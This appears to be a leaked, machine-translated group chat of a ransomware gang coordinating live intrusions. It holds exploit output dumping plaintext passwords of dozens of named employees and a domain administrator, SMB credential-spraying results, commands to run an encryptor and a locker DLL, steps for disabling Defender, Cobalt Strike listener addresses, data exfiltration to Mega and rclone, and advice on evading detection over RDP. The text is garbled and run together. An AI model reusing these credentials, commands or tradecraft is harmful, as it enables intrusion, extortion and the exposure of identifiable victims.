Peace! Labor! Rance! Who decrypted ultraVNC?ini , there's a hash{"$binary":"8kWjqI0y8R+MNt/Kub61wAPryhMSHUtb9U5HZdyStO1UZFZugftryBYpesOxjRkSHkIpKUfUQ3iZ8Y6PgUMTyD3Pd69Fwo6HuYH0uK2WT5eHdm0Ru8pyrkCPDWs3/WyZRviJGj6MaEHpvu4MqaPipVv8nIczyt2qjBZQY/W/4DkaAmvdGdLlmDQl2V7al69LkGfR6nZrELn0K1CrLtzHO5ubVeLPCR1HzXIUj6qfqSy8D9jL"}{"$binary":"qlY9Yy/uKCOjgjFaDHegKKYKuWCtCV5e4xxcN73o9Y3T1EeAbrKGJELVsZncMlxqppiOlLXDIsWILbkknTxKzZKx6fgducw1SagGWekXyIHQRMk9viX7pzOASl31nvLdTcIF0f6hBro8EF4EL08nY4D/+Jz0INaiE54PZ9s+TcmUpeXxHf6CDZGjoX+ZpIBgqRANdMydjWhAgYEqfvaI1"}{"$binary""xPACqYgFfTMW286bcFZjKwwFOzc9DMCuywe1mtRataDIZEf6cI2BsEX6eClML8xkzpgVRsx5o1bg7wBrz9VtvrAz2RPRjwPpZ1N8ijcGR/idLDAUpsv6EPHjJMKt4CdWZcriyFj1d9nqz/yQOTZ7sp4F/8W3nzqy1mIzTaecw+z247sVv3mQTDb7QSVahenetbKpXtM9QYaEgav1Bih9LlsVZhUqAuTggtZMs9t4FQ=="}{"$binary":"LrqENVpIrVsphbKn+Qnm6ZoLgeO0/VgmGzo1QrHjJeFnlHlUNHWfxozW3m9uRGVSHnYH1wZKqV7yMg9/uVC/XqUGaF3zgdIKJpi5gvsQ0VNS5wmwjG/TsiJSrA8AKMyiiaAMivi5oZGtYecTKOFGh7h+F2M+cyKsGRy0l8uHs0SfAOkvID0vPmR9zbFdOez9L1+P6FHWsCVh+JoYyQ2aBV6rWn0CM7uzHY1t0HNU0A=="}привет@alter please add jaskaga ok@all about pouring the data on "silent"
we will do it at the end of this week, please structure the data on old cases not to stretch this process too long, I will create news and give accesses / company codes to fill@all a set of alternatives to ngrock, for tunneling
https://github.com/anderspitman/awesome-tunnelingно there's a newer version of this, we won't be filming it today@all friends, I'm going to bed early today, if anyone needs cases, PM me please[ ](https://stylebrooks.com/group/general?msg=Q72XGqyet3ixEiuXe) --ftp-user
--ftp-user is interesting, is there an example command?
If megasync lags, can not download the archive or the speed is very low, you can use the same rclone to unload the archive

rclone.exe move remote:archive E:\ -P --multi-thread-streams 12 --transfers 12

where remote is the name of the config, archive is the name of the folder, E:\ is the folder where the archive will be dumped, -P shows the progress of the download, to not see any progress change it to -q, --multi-thread-streams and transfers for high downloads

really helped a lot to cope with anomalies in the form of 200 kb/s and when the archive is downloaded 500 times and eventually not saved to disk
``OK, it worked.
but you have to ctrl+c ctrl+v at once, and only then do archiving, because archiving takes a fuckload of time, and copying 1-1.5 minutes, then you can already archive and downloadThe basic difference between OST and PST is that OST files are used to save data for offline use and are stored in MS Exchange Server. Whereas PST files are personal folder data and stored on client's hard disk.
but i could be wrong - it's been a while since i got mail like this - i don't remember but it might have worked you know what
copy and paste it in explorer outlook make a copy near it and return the outlook to the crawlspace) nst xhost is the in and out of the mail pst is confused with nst
nst weighs 16gb - it's copied via shadow
outst weighs 12gb, some hosts have 25gb.
pst is a mail archive
kill the outlook, make a copy quickly and get the copy back
i have a problem with outlook copying mail from a host via smb? i make an outlook copy, then i copy an nst file that weighs 20-30mb - it's copied successfully, but copying is successful, but the file does not appear even after a couple hours i fucked up a couple of archives when i downloaded it from mega not so long ago too...this is a feature of the fpt protocol. break the file into smaller pieces and monitor the plum on fpt if the connection is broken he starts downloading again, it's like a prank and rights, I kick the user who sends the archive to the server, he reconnects instantly, the server deletes the archive and starts downloading again
I removed the rights to delete and all seemed to be normal, in 2 hours, I will tell the server will help? some kind of heisenbug, before only one of the five files behaved as strange as disabling the rights of the user to delete anything in the folder downloaded, deleted, and downloads again ))))[ ](https://stylebrooks.com/group/general?msg=Q8pfTaZX3zAkSuWE6) do not believe me, but with ftp some anomaly occurs
he downloads the whole archive, then just re-connects and starts downloading again and there's $100 for 2TBA so Pcloud lives longer, but they can also aboot it, and it also connects to pclone.why i've downloaded an archive of 100 gig from mega for the second time, it successfully downloaded, then deleted and the download begins to go again? before it was even successfully downloaded, but then deleted a day later if it does not rise - network proaktivka cuts the first vpn up, then the sessionparny, maybe someone has faced similar problems and advise how to be...in general, I threw my addy in the coba and raised the addy to the coba, as soon as I raise the ipn, the network in the coba dies. hello all !yes, I just decided that I packed through 7z, it did not fuck up and no problems assembled the archive in 7z can be set way of encoding What archiver do you use?i understand you can rename it) but you don't want to when you are in a hurry? there is a solution for french fuckin' coding:pray:https://www.sendspace.com/file/cw7h2d - 30 days available i'll send you the info then what's wrong, not enough to fill it thanks you'll have to wait) is filling all hi):wave
maybe someone has a video on ms17
throw pliz :slight_smile: :handshake:by prescribing you mean him and the logonserv?
by creating an asset directory domain with the same name.
``Who has encountered EPC Check fail on SonicWall
If the check (and it often is) only on the occurrence of your machine in the domain, you can bypass it by creating an active directory domain of the same name.
Which domain is needed - can be seen in SonicWall's log
@sargon add please, I'm sure often such a protection which bypassed half an hour hour ... so from the off site you can download the same guys have a client under vSphere ?`ctrl+shift+esc ` - open task manager just wanted to write) decided: in the username was a backslash and it was not shielded normally from this and error@all guys, who got this error when decrypting viam?
I got the hashes with = - at the end decrypted all right, but the ones without gave out the following error:
```
veeam.cs(21,32): error CS1009: Unrecognized escape sequence
``New vpns given to work as well as the collection 2fa codes needed, tentatively should be ready and go in hand by 22nd of MoscowPrimary@all sorry, yesterday was absent for personal reasons
koba clean, with each time just more and more difficult ... when the alt will be online who knows? anyone decrypted passes from SAP? and want to staging the domain (or IP) is written in both fields or only in staging-poley what to do, artkit with detektskogo cost koba clean? I did on this manu, maybe help someone.
`https://www.bussink.net/ad-cs-exploit-via-petitpotam-from-0-to-domain-domain/ `through a pass ticket can get on C$ and do anything, nds shoot for example at the output should be a tgt ticket from DC$ (spn account cd) write down who will be able to untwist to the end of this attack, I do not have the right targets>Exception: Client does not support SMB2
this means that smb3 is usedhttp://github.com/bats3c/ADCSPwnFound the manuscript, but for some reason python script spits this error.
```
Traceback (most recent call last):
  File "/usr/local/lib/python3.7/dist-packages/impacket/smbserver.py", line 4281, in processRequest
    connId, self, packet, True)
  File "/usr/local/lib/python3.7/dist-packages/impacket/examples/ntlmrelayx/servers/smbrelayserver.py", line 149, in SmbNegotiate
    raise Exception('Client does not support SMB2, fallbacking')
Exception: Client does not support SMB2, fallbacking
``Gentlemen, hello there.
Has anyone been smoking this?
``https://github.com/topotam/PetitPotam``@all
folks, has anyone localized the nix servers (ubuntu, debian)
if you give the command
./encryptor --path / --prockiller
from root
then lock the entire server with the system files (passwd, shadow, sshd as an example), actually slow down skl, apache and other services and their lockant and the server will be unavailable? yes ok give the full composition of hell from here should seeomuchomu in a privately not see your messages, and in groups all normal wait 10-15 minutes will attach you to someone else, I remember hey hey, I am the new admin. have any work to practice? Tomorrow at 7 gathering will be fine In 3-4 rounds in 12 hours we can start now 8 am what time we will close the network @alter need a build102 gb62 gb already downloaded ``gic\administrator G3n3r@l1$
gic\atgadministrator @ltt3ch$
gic\s-365 G3n3r@l1$
``````Members

-------------------------------------------------------------------------------
Administrator atgadmin AtgNet
BSchlegal s-365
The command completed successfully.
``Pumping started jumping ?-yeah windows will finish them there just 400 pieces everything will be yes I just vorki pinged put@Air brother let's jump take the balls and unload them here at the entrance of the admin caught well here somehow izidajte jumpzatel[+] 172.22.9.18:445 - 172.22.9.18:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator
[+] 172.22.9.5:445 - 172.22.9.5:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator
[+] 172.22.9.3:445 - 172.22.9.3:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator
[+] 172.22.9.17:445 - 172.22.9.17:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator
[+] 172.22.9.196:445 - 172.22.9.196:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator
[+] 172.22.9.2:445 - 172.22.9.2:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator
[*] Scanned 6 of 8 hosts (75% complete)
[+] 172.22.9.24:445 - 172.22.9.24:445 - Success: 'gic\administrator:G3n3r@l1$' Administratorknow sb prognosticating pingnutsperer
172.22.9.18
172.22.9.17
172.22.9.5
172.22.9.196
172.22.9.9
172.22.9.2
172.22.9.24
# Lady, you haven't pinged yet? # # If not, let's ping pong access # # Wouldn't it be nice if we could get the admin to ping pong? # pid it's my dedic185.150.189.202 koba we kinda have an admin first we're interested in servers can you run smb login 15 servers and 402 vork[ ](https://stylebrooks.com/group/generalinsulation.com?msg=p4dd4ySGDjecmh9g2) hello , help what? okvpn up now i'll raise the vpn and run everything on smbokytevin gobbyvampir guys gobbytu i guess domain admin at the entrance directly
```
[+] Checking URL https://69.84.159.94
[+] Found latest version (9.x+) of SMA appliance
[+] Appliance running version 10.2.0.1-18sv

[+] Leaking sessions to dump configuration.
      [+] Found: SessionID: 0agye8ssdBaNcrk6Zl0WqVCxdNYplgJ5gBlRAMhUlEA= userType: 1 userName: dlyons Password: maggie1999 Domain: GIC.Local
      [+] Found: SessionID: 0y3mQ3Y1Nf1DhqnUW5N0wI6BX7DkSqkbMvvs0e7g8g8= userType: 1 userName: ecasterline Password: maggie Domain: GIC.Local
      [+] Found: SessionID: 3u0H0cRw90px9P8w6EzfSMDix5nE0EUueuAYNM4U02U= userType: 1 userName: pdonovan Password: #32Wilkins# Domain: GIC.Local
      [+] Found: SessionID: 4N6urKz1seDuCRwnBe1RlvtwKrXpRhqoGoStFime3cLM= userType: 1 userName: dsweeney Password: Welcome123$ Domain: GIC.Local
      [+] Found: SessionID: 5WMU0MCfO1HoETuBIPbCA8LDug0Su8hL9UVR4u1P100= userType: 1 userName: speschl Password: Walleye5252! Domain: GIC.Local
      [+] Found: SessionID: 9sIZQSAJ4YZ391RLGh86y4cAqVAeU09BdfAy6N8FaK8= userType: 1 userName: dferdinand Password: jessica Domain: GIC.Local
      [+] Found: SessionID: AHpEryyF019muOFFJwkke7moSfaB12pM4am7xTUEQh7o= userType: 1 userName: tmeegan Password: Bassman1! Domain: GIC.Local
      [+] Found: SessionID: AJPLSQg1gpryzZOG0sovAedr9GctS1seHcGYTDk8Bek= userType: 1 userName: msnodgrass Password: Husmuog@1980 Domain: GIC.Local
      [+] Found: SessionID: DWOjoF2e6oP6kvRKDjslkJCOi9WY80TAgwj1eSeKtiU= userType: 1 userName: wbrooks Password: Grace123$ Domain: GIC.Local
      [+] Found: SessionID: EiyHS96h47h544VyrFpwzaigmdT7l9PFOXBDCa7idfs= userType: 1 userName: mclinger Password: bosox Domain: GIC.Local
      [+] Found: SessionID: FeP72wVY8uhKgQgR1vaJwkTKw5VG3s1KOJvvKm6xQI= userType: 1 userName: rrenaud Password: trymer Domain: GIC.Local
      [+] Found: SessionID: GbsIiEmyryOMSas8qR9xAgc3hceH60znCnVWIo32Gc= userType: 1 userName: dmidura Password: trintrin49 Domain: GIC.Local
      [+] Found: SessionID: JpyHlguSmyzdo5PdsflWpJSR9YOtJXiF6FUNy4cD03c= userType: 1 userName: mgonzalez Password: Warmup90! Domain: GIC.Local
      [+] Found: SessionID: K2C27y1YPPhgkD2A5KZdrtcJqL8kWZVMzXEuDWkUwQ= userType: 1 userName: mcollins Password: Sandycjr5# Domain: GIC.Local
      [+] Found: SessionID: K93x9o5n5E8pCMXlcZ7Q3AUWaFm9wLvYjjWdSqnvqdI= userType: 1 userName: jmoore Password: 1oliviaZ Domain: GIC.Local
      [+] Found: SessionID: L7yJQQCujzM3qJiBoR1jWtDmTInBNhqIeFo0bvEsC6o= userType: 1 userName: fr2granara Password: frank25 Domain: GIC.Local
      [+] Found: SessionID: Ov17M0I1P0E0wNfYhQC0eH9NQM0lqOZCOA6Jpaiekus= userType: 1 userName: gtowle Password: Drifters2$ Domain: GIC.Local
      [+] Found: SessionID: PtTgV72emTIxe04dvnF2WTyuEGNb0S7qPEaFDFTTxHg= userType: 1 userName: rcampbell Password: alex11 Domain: GIC.Local
      [+] Found: SessionID: QBDBUhXvWk1jyBX7xNBK5qc5VFHteEvn1pFtE1LjVAQ= userType: 1 userName: cmarmaduke Password: customer Domain: GIC.Local
      [+] Found: SessionID: QDsmuPP7OAnWyOOubJQQyZHdlGvAd0dSG7zW0MTRUKM= userType: 1 userName: wgardiner Password: Melrose2 Domain: GIC.Local
      [+] Found: SessionID: Wcr9AaobUMuJUXwISbBZBvsuoyJ1s7iMhbq5d0iKcDY= userType: 1 userName: barcure Password: willieb17 Domain: GIC.Local
      [+] Found: SessionID: ZR21V7zgJXk60SBi7dcxfsVyQMQTWt88jQlZOH0UQWg= userType: 1 userName: lraab Password: Floorplan18 Domain: GIC.Local
      [+] Found: SessionID: axlkOmu2994Gep7JspYjuqtL4ZkpV91yaQaTzc0LVo= userType: 1 userName: esheara Password: Freddyc256 Domain: GIC.Local
      [+] Found: SessionID: dP7r6R7kKD58IiZ0djlSTNguhsxZcMzr0KRJ4A40fXg= userType: 1 userName: aoral Password: @nthony1 Domain: GIC.Local
      [+] Found: SessionID: eQwhnplhToF16fqjkJjzgxvVtduIBON0qz3CtuEe6zk= userType: 1 userName: mcoleman Password: coleman5912 Domain: GIC.Local
      [+] Found: SessionID: f4Kqq8okWmvVbQb1zscKa0naph4EQBF2PrxdD4X17qnuw= userType: 1 userName: kcarabello Password: Nicnkay7* Domain: GIC.Local
      [+] Found: SessionID: fdWOLpEau4d95qsAASBb1DGPVFvPhTv9DD0pEV8WlA= userType: 1 userName: plenzie Password: Blizzard1 Domain: GIC.Local
      [+] Found: SessionID: h5K7GKiSNw0iFC4w0FyvoBEiaL3nS1Y3UO1Z6tNDVAw= userType: 1 userName: ncseresznye Password: Welcome123$ Domain: GIC.Local
      [+] Found: SessionID: mWusU4dFejfPKNb5D1WJ6toR97y1yG41M9kBcjXNhcs= userType: 1 userName: hkoenig Password: Welcome123$ Domain: GIC.Local
      [+] Found: SessionID: q1RmZkd1esnMrzVra3RRMkznBL0JMpyRyQS1mcxMm5Y= userType: 1 userName: fquieti Password: cheryl3272 Domain: GIC.Local
      [+] Found: SessionID: qW11OtThcdntTddSEI7g0d01sQm4fkPqp9kTrdoXgoQ= userType: 1 userName: tbowen Password: Hadley123 Domain: GIC.Local
      [+] Found: SessionID: rbpQCm9CTSAEWhJfgXfFk6qwCoiYQVW79wyldz7yC6Y= userType: 1 userName: kthibodeaux Password: benjamin01 Domain: GIC.Local
      [+] Found: SessionID: uzjxsaL7Y1Aildxvh3De1ZnxfGlpgg0MzfUyUye19YA= userType: 1 userName: pbinkley Password: madison2001 Domain: GIC.Local
      [+] Found: SessionID: vmuFiC3uYrByDgZjIqaUR1xskukOGZJP1ChbVp2xF2Y= userType: 1 userName: cridenour Password: R!denour1 Domain: GIC.Local
      [+] Found: SessionID: ydcQvPYrdE7LrcCOXC97C0J1ClmYW321Q1v2ou9Q20VU= userType: 1 userName: jcoleman Password: rosebud4898 Domain: GIC.Local
[+] Done with https://69.84.159.94, found 35 sessions
35
[+] Saving session data
[+] Trying session 0agye8ssdBaNcrk6Zl0WqVCxdNYplgJ5gBlRAMhUlEA=
[+] Saving config to ./Dumps/69.84.159.94/config.sqlite
[==================================================]

[+] AD creds administrator:G3n3r@l1$@172.22.9.3
```
``Additional feature added to the option to run the locker, which removes some of the AV detects when dropping it on the disk
Startup via regsvr32

```
regsvr32.exe /s locker.dll - without arguments
regsvr32.exe /s /n /i: "here arguments" - with arguments
```

This update has brought a need to change the entry point, so all builds, which were issued before February 8 with the new fresh versions of BOOFs will NOT work!
please when preparing new cases to take the NEW builds with the NEW BOOF files injector@all download and scrdate there is such a toolzagle pg adminsxxxxx
no tips) who can tell me what would work in msf utility msf5 > db_nmap to scan the ports what and how to raise the need in ipso in Ubuntu?
right now on startup it gives out
``[-] Database not connected
```
i need to raise the base on postgres type - who can tell me commands to run postgres and create a base, what would this machine work)?Air:metal:I am also glad to be with you)glad to see you in our circles:metal:hh:v:hhy spunoktam there are instructions and vidosat for starters read the branch of Generalstevan tell me how to start well acquainted with the guys so farshetope will soon be setsroon servers you orderedreetreetreet @sroonreet all hi I am new to you 30minutilizov. Grid is there bro ?all hello okay hey hey guys I will be in 3-4 hours fully I have reinstalledscould try to reboothhhz what is it too here @steven even can not connect all hellohey hey bro:joy:at least one here hello )how are you doing? hope all the fire all hey bandat.e connection to the cob on the domain?the route is when the cobalt is bolted to the domaing let's see i step back an hour and a halfaha, looking for shahrabrad let's see passa hi hi all hi banda hi , what is the route , i think i have without , since i work as of originally given a simple ip vps server , i certainly do not directly cling to it .., but still explain about plokladki plz) gentlemen, who have servers without gaskets - please write down the name)) dataevolution directly necessary104.243.46.74 443mne too netz plz
104.149.168.199 443)) steven now coming) with what to work there is (steven sitting idle since yesterday:zany_face:hello hello:smiling_imp:hello gangFurymario:joy:llovely bros/beacon_https/reverse_https 142.202.205.88 443 142.202.205.20588i listenerenerenerenergyafterwards I'm going to workoutafterwards guys who are online all crossed fingers:smiling_imp:hello there is ok guys:metal: how is this week going to go? hello! I want to finish my workoutafterwards we will pick something up hello hello Steve, what do I have to do? I downloaded the files, but we'll get into prodhai sonar:metal:helloBrendon:metal:kkprivetag altera wait for the week was not ace all hello gangZdhai brendon will work today ?i can't find anything i like so i just got here and i don't know if it's okay we will think about it today so i will do it now tell me what's going on at work today. On any resource can I rent and raise ?((we are waiting for the guys tomorrow progruzhey be online in 30 minutes will give networks:D:laughing: :joy: :joy:well leave them on the bottles of whiskey from their money when they pay ) :joy:do not forget about the tips :-D handsome guys be online guys I still very busy zdarovarov:v: hi hi guys:metal:kkya aftk for 20 minutes guys bots I'm waiting now sent to progroukkk5 minya tutochkiha smoke pendohal bye++++++ guys who are in the studio opisheeshas all the tasks yes, wanted to dig, or what to do if memory serves you there on your own car admintak there we were caught in the kerd, or what to do?)Hi, I will do a lot of pointers so guys who do what to do hello broooooooooooooooooooo we are all waiting for the curators then)I hate Mon finally solved all the cases with a pity) Mon is a hard dayhome someone showed up hello brooprivetau:rolling_eyes:taak, and where is the dispplina? i hope the beginning of a new week will be productive.secdaily ?or generate you a couple zakrepov ? aha Brandon if anything jump to winlogon if you come updo tomorrowokbuduemo for today offkya in placeokkya afk for 1-2 hours and will be up until morning in us seekkakoya there antivirus, etc all be prepared to lock today kamupus go to prodPriyat
ecampus.com.
got the info, what to do next.

systemtechnologyinc.com
Gatherinfiku who and where zatupy so let's go through the networks all hello sopunovoy will give today will be taught it is the very start search for servers through the domain controller, collecting information on AD: users, computers, groups search and sorting users, ipis, search sharsborov it what?i got it, i can't find it @all i need two builds with nix version and eshi - the last oneokay
I'll do something now
you without tasks? 2 more in the process of negotiating what the fuck is the news from k12 all hello, what news? ok, wait for tomorrow will be good guys, when the work to expect?and something else I do not remember all wait for networking with 2 sesti also call scammers from sbera say let's toss the k12 talks do not piss wait for the download download download wait for work? hello there are no work yet?guys have any idea when it will end ? wait for the download steve, today there will be work ? hello yes there will be work today ? hello hello everybody hi ! tomorrow either vpn or session i think that tomorrow the networks will be tomorrow guys are downloading as something will be i message wait for the silence again ? hello will watch hello hello today will be anything ? hello everybody ! thanks just or staskom, should work manson thank you !
Samuel, send me the batik, if it's not a problem) hello. can you try to disable with the batik. is it realistic to do without pvershell and without rdp? guys, who disabled vindefender through cmd (shell) on a remote machine? openvpn with killswitch

>
nordvpn
privatemyaccess
I've seen a couple more of these on some publika providers.
Who set up a Kill Switch + Open Vpn? with docx there need to unpack it, and then put it back on the placeportablpiton nakatiea I have never linbla, it linbla should be put + SharpChrome / Firefox passwordsA highly recommend ))))) or rather not recommend itRecommend if possible all NTDS by 200 lines dekripto. I often got passes from chrome + ntds. literally on the CPU for a few seconds).atdushiHash the curator and he will give the decrypt to http://null-byte.wonderhowto.com/how-to/crack-password-protected-microsoft-office-files-including-word-docs-excel-spreadsheets-0193959/cookie this, .docx is password-protected, anyone know how to open ?only in msfv kob it does not knock the password string last `shell net user admin /domain
``How can I see in the cob when the username has changed the password ?white hello, I do not have any notifications, keep the sound down and fire angry with the fact that really when there is a controversy, half the screen is flooded with notifications if you know everything, well done, we are newbies and we need all these discussions in order to learn and become better:smiling_imp:red why angry then, turn off the sound thentut and it should discuss itmasters conspiracy, give theories about SORM, etc. in private) and so constantly knock messages did not hear about it how?only after vpn\soxy I never connect directly to the torus here config, I think you'll understand what to change)
```
#!/bin/bash
/sbin/iptables -F && \
/sbin/iptables -F -t nat && \
/sbin/iptables -X && \
/sbin/iptables -P INPUT ACCEPT && \
/sbin/iptables -P FORWARD ACCEPT && \
/sbin/iptables -P OUTPUT ACCEPT && \
/sbin/iptables-save > /dev/null
/sbin/iptables -P OUTPUT DROP
/sbin/iptables -A INPUT -i lo -j ACCEPT
/sbin/iptables -A INPUT -m state --state ESTABLISHED, RELATED -j ACCEPT
/sbin/iptables -A OUTPUT -o lo -j ACCEPT
# ip ot podpiski 183.30.41.59 our = 83.193.11:210
/sbin/iptables -A OUTPUT -o eth0 -d 83.193.11:210 -j ACCEPT
/sbin/iptables -A OUTPUT -o wlp3s0 -d 83.193.11:210 -j ACCEPT
/sbin/iptables -A OUTPUT -o tun0 -j ACCEPT
/sbin/iptables -A OUTPUT -m state --state ESTABLISHED, RELATED -j ACCEPT

```[joy]``not unloads but relaxes[ ](https://stylebrooks.com/group/general?msg=4c2HNDbifNHby5q9P) well, you be careful with that kind of question :)who how relaxes himself guys:joy:happy to know who's having fun dunhill blue:smiling_imp:test *okay, the test passed) i don't smoke them again cones ? alex, rosette, ragnarok, mansonya work to smoke, who with me:grin:+++the topic is relevant to all) idle guys, and the time is 1 a.m. - no work? :) we're poor people, we live in rentals, drive tazas, wear clothes from the chinese:zany_face:guess =)))))))again, only when you have money, the motherland finds reasons to squeeze))) fuck, who the hacker here who has the new gelendagen on the districthuminescents change modemswas much easier to figure out will not sim and on the device, and not all devices change imai, so you better immediately and modem / router changejoy:that's true, I do not know why we should be interesting here =) we're doing our best for our country!i would have to take a router with a SIM card and also change the username when switching SIM cards, would that be ok?you with a smirk said with a smirk) change of SIM card will not do anything unless you have different phones, and you use only trolley and all through VPN, it's better to change the modem once a month? i have not been approached) and the change of SIM card once a month does not work +[ ](https://stylebrooks.com/group/general?msg=6CbYQvhqTuGpaNvQb) no sense to change the location if you carry a mobile with you, imai devices mobile + imai modem will all the time nearrazetka and you knocked in the masks already?))) but shhh :) to the kitchen once an hour gde) workplace, or poh? guys tell me how often you change location?supports ðrnache to the adapter vpna virtual can mount) as altertaiva khuniksu virtual router pfsens very convenient to manage traffic virtualokda normal theme, checha) the main thing ipiteibls config saveeda, normal theme with scriptotam through iptables done if someone needs to give the script can bash, You can change it by your hands and you will have a ready to use config to let the traffic through 1 ipi, select your input VPN as ipi, and the traffic goes through it only, if your VPN goes down, the traffic will not go past it. Norm theme. put isikoroch zaroutat traffic through the root in the vpn what killsvitchet same is simply a couple of nodes add and change from time to time, che =) worked off a couple of grids - change.not that snifet, and the logs are like the central routers remain what your VPN and the difference in security from the public[ ](https://stylebrooks.com/group/general?msg=L43qA8SHeW6DkKTy) convenient?) skidyl, but I'm like that all my own doing it all hz) alter gril that you can protect against dropping traffic literally there 4-5 strings vaktya like ssh gave, setapni, pochekal - all ok) no instructions. contact can share admin local setapil. protection against dropping trafficnalogue for VPN. ahaasvoivpn own? a separate laptop
on the laptop only the virtualizer and the hoonix analogue
then for each thing a different route + - in the end, it is kind of like a dedicated server to take, put the virtualization + encrypted boot sector crypto, the key for the decryption is stored somewhere in the memory, then it can be dumped as a result there do wpsvatschete if ok then just advise services or countries without logs does not happen =) without logs and bs bitmomething not to store anything on their virtualkuPlease advise services vsdushki in the wind also utilitiesdisk party is linuxmuzhiki i can't find it, i can't use it, i can't find it in the list of processes, i don't know what to do, i can't send commands to it, and i don't understand it, i can't use it in the list of processes, i can also try to break into a folder i put a token yes, october file browser, try to break into a server, sometimes i put a token on, it says that the system, but in fact the token is on, how to make sure that the token is put on? say, if I sit under the system:thumbsup:agreehttp://www.zerodayinitiative.com/advisories/published/ speaking of zero day vulnerabilities, a good resourcehttp://www.secura.com/blog/zero-logonновая hole in the asset directoryDo it on dk? after that everywhere def knocked out. much more convenient batiko+` ``gpupdate /force
``-------To knock out the defender via the GPO
https://www.prajwaldesai.com/how-to-turn-off-windows-defender-using-group-policy/+all traffic is encrypted, no detecting and we can ping, snoop, roam, throw port to the outside of the LAN =) the diap what to do and what to put there (1 command is ideal) so in short I think you can even localize through this ccj + you can roam on computers in search of files upload ccj client no problem with handsrms, well, run it out and make it simple =) ------------------Kill defender in bulk
``https://www.prajwaldesai.com/how-to-turn-off-windows-defender-using-group-policy/
``https://spy-soft.net/vpn-tunnel-windows-linux/
this guy's manualVPN tunnel over SSH (L2/L3 tunnels)``https://xakep.ru/2020/09/08/windows-pivoting/
``Guys, any networkers? VPN over SSH can someone collect up to 1 command? very cool will help everyone ... if the archive is pulling too much traffic? here yes, well, as an alternative, you can split into separate archives, I downloaded the archive of 2gb, everything went fine this archive with a bunch of dllos, fill it then ekstractym in the folder mg, here do not load so download from the link:
https://mega.nz/file/G4wzjYxI#oVtJtRACPNiQEMLYaqa88Fx7UzqSbEAlv0dULAYo6gg--- If you need to download many heavy files from the ball, it will take a long time to pull them through coba, you can unzip them to mega using megacmd, ---
Pre-archiving files into zip
```
MegaNZ usage
1) Create folder for files
2) Uploads exe and dll files to created folder
3) Start background MEGAcmdServer.exe
4) Use the commands:
> MEGAclient.exe update --auto=off # disable autoupdate for megacmd
> MEGAclient.exe login login password # init session by creds
> MEGAclient.exe # check connection
> MEGAclient.exe put -q --ignore-quota-warn test.txt # upload file to acc storage [-q background process]
> MEGAclient.exe ls # check remote directory
> MEGAclient.exe logout # end session
> MEGAclient.exe quit # kill MEGAcmdServer.exe
5) Remove special folder for MEGAcmd.
6) Remove update task from schtasks:
> schtasks /query /FO list | findstr /i "mega"
> SCHTASKS /TN "\mega\ FULL NAME HERE" /DELETE /F


example:

> MEGAclient.exe update --auto=off
	Automatic updates disabled

> MEGAclient.exe login supertest@mail.test P@$$w0rd
	log in

> MEGAclient.exe whoami
	Account e-mail: supertest@mail.test, check our account

> MEGAclient.exe put -q --ignore-quota-warn C:\temp\test.txt
	upload test.txt

> MEGAclient.exe ls
	test.txt, check what files already uploaded

> MEGAclient.exe logout
	Logging out...

> MEGAclient.exe quit
	close megaclient

> schtasks /query /FO list | findstr /i "mega"
Folder: \MEGA
TaskName:      \MEGA\MEGAcmd Update Task S-1-5-10-1145623454-6237456245-1243533621-3000
> SCHTASKS /TN "\MEGA\MEGAcmd Update Task S-1-5-10-1145623454-6237456245-1243533621-3000" /DELETE /F

Then you can also check with tasklist, and use taskkil to kill the mega process
``YeahYeah, right!
Not always the truth these accounts RDP is included, but in our cases while digging - it works quite well)@addition, always have to climb service acom, much less % under it will climb to this service, acom respectively not SQLLLXXXXADMIN) and the team installadmin, winadmin and so on ------------------- If you really need RDP in the lock :: HOW NOT to LOSE ::
1. Choose a server OS , ping, found. Do a dir listing
``ls \\\\\REMOTE-HOSTNAME\C$\Users``.
Sorting by Modified. Where there is a fresh touch - under these users definitely DO NOT log in because it's easy to get the following situation - you came in, downloading balls/testing something and suddenly this user logs in to this pc and sees your results... Detect. Cleaning. End game.
To do this, select a polzak who on this server went last year, say.
I think the mechanics of it is clear?
2. Select polzak from YES, which hangs in YES, but almost never used
``hell net group "Domain Admins" /domain``.
This is a list of our licenses.
Next, we skim the user information one by one
``hell net user Administrator /domain
Look for Last Logon line - i.e. last time he logged on the network (on any of the PCs in the network)
If there is a date like the month before last month, half a year or even a year - great. That's what we need. Most likely it is either a service account or admin they do not go and you on the RDP, he certainly does not bother.

These are simple tricks that will help you not to get caught on the RDP

3. Do not linger on RDP, after you have finished - do Logoff (MUST). Not to be confused with just closing RDP window.
=):ok_hand: )friends, I'm very busy, today I will be a little later than usualHow to decrypt the real one, looks like HEX but no wayMicrosoft_WinInet_192.168.0.10:80/** 65490 *\backup 01 00 00 00 d0 8c 9d df 01 15 d1 11 8c 7a 00 c0 4f c2 97 eb 01 00 00 00 00 c7 71 71 3d cf 77 84 c6 43 9c 78 9f b3 75 8c e6 be 00 00 00 00 18 00 00 00 57 00 49 00 4e 00 49 00 4e 00 45 00 54 00 43 00 72 00 65 00 64 00 00 00 03 66 00 00 c0 00 00 00 10 00 00 00 2c f7 67 9b f6 85 ad 39 97 e0 40 3a 36 7e 45 99 00 00 00 00 04 80 00 00 a0 00 00 10 00 00 00 67 22 c8 7b 4e f1 2b 80 59 3e 1d 02 f9 bc 0c e6 20 00 00 00 00 bc 0a c5 ab 6e 3a a7 05 8b 5a ce 75 2b b9 9d 63 c8 78 ac 4b 04 8e e5 cc 8a 4a 4a fc 0f ac 3a 5e 54 14 00 00 00 ba b6 a2 32 76 da 02 73 a7 60 f1 7f 93 c6 78 6a 82 32 26de does anyone know what this is from mimicry?

